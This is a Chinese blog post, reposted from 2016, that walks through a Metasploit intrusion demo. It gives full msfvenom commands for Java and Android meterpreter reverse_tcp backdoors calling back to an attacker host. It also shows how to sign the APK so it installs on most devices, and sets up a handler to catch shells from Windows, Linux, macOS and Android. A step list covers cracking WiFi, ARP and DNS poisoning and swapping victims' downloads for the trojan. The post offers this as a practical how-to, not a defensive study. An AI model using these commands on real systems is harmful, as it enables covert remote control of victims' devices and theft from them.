美文网首页
msf 直接控制大多数设备

msf 直接控制大多数设备

作者: KID_SAMA | 来源:发表于2019-01-17 16:05 被阅读0次

这是我2016年写的一个博客,记录了一个入侵demo,原来的博客快支撑不下去了,现在转移到这来,以后还可以捡起来...以前的博客还是很稚嫩啊...

注:获取目的主机的IP以及诱使目的主机下载并运行木马可以通过局域网的监听和毒化操作实现
(2019/1/7添加:)大致流程:
1.入侵进入局域网:利用Kali 中的WiFi破解工具,稳稳当当
2.监听局域网数据流:利用arproof或ettercap或wireshark可以实现
3.劫持流量&arp毒化:利用2中的工具即可实现
4.dns毒化&搭建fake web:利用ettercap和setool可以实现
5.替换对方数据流:利用ettercap可以实现
6.等待对方运行:自己等吧

metasploit不愧为一大自动化渗透神器。各个平台的渗透轻松应对,现在除了iphone我还不会,其他的大多数平台我已经来去自如了。利用java的跨平台特性同一个payload可以直接拿下大量shell !
It's Show Time!

首先打开Kali Linux

Kali IP
msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=192.168.1.107 LPORT=4444 -t jar > jar_test.jar

# 使用的payload 是 `java/meterpreter/reverse_tcp`

# 生成的jar包直接用 `java -jar XXXX.jar` 来运行

打开msfconsole

msfconsole

use exploit/multi/handler 

set payload java/meterpreter/reverse_tcp 

set LHOST 192.168.1.107

set LPORT 4444 

exploit -j -z

# 然后就等着鱼儿上钩吧 ^_^ 使用 sessions -i 来查看上钩的鱼儿

首先演示 Windows 8.1 上钩效果

运行

win8 运行

上钩


Win8.1 上钩

接着是linux

我就用kali linux 本身来测试了

Kali 运行 Kali 上钩

然后是我日思夜想的Mac OS X

Mac OS 10.10 运行 Mac OS 10.10 上钩

哇咔咔!!三大平台已经干掉了,就剩移动端了,

一般来说Mac电脑上会装上java的,所以这个payload 成功率很大,而linux自带java,有些电脑小白不会在windows中安装java,单数那也不怕,我的别的文章可以直接攻击windows,专门攻击windows的payload还是相当多的,免杀也可以做起来。

iphone咱先放放,我还不会,安卓就是小case了。

安卓的涉及签名什么的,比较麻烦,耐心看下去......
首先生成一个后门apk_test.apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444 R > apk_test.apk

首先使用密钥工具创建密钥库

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
生成密钥库

然后使用JARsigner签名apk

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore apk_test.apk aliasname

再用JARsigner验证签名

jarsigner -verify -verbose -certs apk_test.apk
验证签名

一般Kali 没有安装Zipalign

apt-get install zipalign

然后用zipalign来验证apk

zipalign -v 4 apk_test.apk new_test.apk
最终生成

这样我们就有了一个带有签名的apk,它可以安装在大多数安卓设备上了

我安装在模拟器中

payload安装

然后打开msfconsole

msfconsole

use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST 192.168.1.107

set LPORT 4444

exploit

然后运行apk

msf的结果是这样的

安卓上钩

OK!

打完收工,目前msf只能应用于内网,要想应用到外网,要有外网IP和端口转发,这个以后再弄了(2019/1/7吐槽:后来根本就没弄),附上两个参考链接。

msf Java 后门

msf VS 安卓

累炸,十二点半了。。。。我当时竟然十二点半就喊累了.....

相关文章

  • msf 直接控制大多数设备

    这是我2016年写的一个博客,记录了一个入侵demo,原来的博客快支撑不下去了,现在转移到这来,以后还可以捡起来....

  • msf派生shell到cs

    1 msf获取shell 这里已经在用msf生成了exe 然后直接msf开启监听然后获取shell msf生成ex...

  • Metasploit更新

    msf打开方式 直接在终端输入msfconsole 进入msf的目录/usr/share/metasploit-f...

  • Metasploit基础知识

    1 Metasploit介绍 Metasploit是一个漏洞利用框架,简称msf。默认情况kali直接封装msf工...

  • 31 | 输入与输出

    image.png 设备控制器:屏蔽不同硬件的差异,使CPU可以通过直接读写寄存器控制设备。块设备:将信息存储到固...

  • 操作系统|设备与CPU之间数据传输控制方式

    设备与CPU之间数据传输控制方式有4种,它们是程序直接控制方式、中断控制方式、直接内存访问(DMA)方式和通道控制...

  • kali安装更新msf5

    哇,前天用msf search一个exp,竟然找不到2018年的漏洞编号但在deepin深度系统中直接安装的msf...

  • msf安装升级+使用

    msf 背景 Msfconsole:是一个一体化集中控制台,允许你访问到几乎所有的MSF框架选项 metasplo...

  • Weditor介绍

    一、安装weditor,python3.6可安装 二、使用 1.1控制台直接输入weditor 三、连接设备 设备...

  • msf控制台管理

    使用全局变量设置 1.开启从控制台记录输入输出 使用ConsoleLogging选项来存储msf控制台输入和输出的...

网友评论

      本文标题:msf 直接控制大多数设备

      本文链接:https://www.haomeiwen.com/subject/sxvidqtx.html